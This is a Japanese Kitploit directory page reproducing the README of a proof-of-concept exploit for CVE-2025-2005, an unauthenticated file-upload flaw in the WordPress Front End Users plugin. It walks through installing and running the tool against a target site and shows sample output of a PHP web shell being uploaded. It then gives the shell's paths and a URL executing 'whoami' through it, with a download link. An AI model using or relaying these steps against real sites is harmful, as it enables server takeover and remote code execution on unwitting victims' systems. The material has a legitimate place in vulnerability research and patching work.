Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-2005 — WordPress FEUP 任意のファイルアップロードエクスプロイト (CVE-2025-2005) | Kitploit
ツール/GitHubGitHub/mrmtwoj/cve-2025-2005
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmrmtwoj/cve-2025-2005

CVE-2025-2005

WordPress FEUP 任意のファイルアップロードエクスプロイト (CVE-2025-2005)

リポジトリを見る
311年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

WordPress FEUP 任意ファイルアップロード脆弱性 (CVE-2025-2005)

このリポジトリは、WordPress プラグイン Front End Users (バージョン 3.2.32 まで) の Proof of Concept (PoC) エクスプロイトを提供します。このプラグインは、登録フォームにおける MIME/ファイルタイプの検証が欠如しているため、任意のファイルアップロードが可能です。これにより、認証されていない攻撃者が悪意のあるファイル (例: ウェブシェル) をアップロードし、サーバー上でのリモートコード実行 (RCE) につながる可能性があります。

機能

  • CVE-2025-2005: WordPress Front End Users プラグインファイルアップロード脆弱性
  • シンプルなコマンドラインインターフェース
  • 登録フォームの自動発見
  • カスタムユーザー名/パスワードによるシェルアップローダー

仕組み

  • 脆弱な FEUP 登録フォームに登録リクエストを送信します。
  • ファイル入力フィールドを介して PHP シェルをアップロードし、ファイルタイプ制限をバイパスします。
  • アップロードステータスを表示し、サイトが脆弱かどうかを通知します。

テスト対象

  • 以下の内容を含む登録フォームを探します:
  • ewd-feup-register-form
  • 以下のような URL 上で:
root@kitploit:~
/register/
/signup/
  • またはホームページで見つかった任意のリンク

はじめに

  • Python 3.x
  • requests および beautifulsoup4 モジュール:
root@kitploit:~
pip install requests beautifulsoup4

インストール

root@kitploit:~
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005

使用方法

root@kitploit:~
python3 exploit.py --url http://target.com --user hacker --password pass123

サンプル出力

root@kitploit:~
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!

エクスプロイトの実行

root@kitploit:~
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
ツールをダウンロード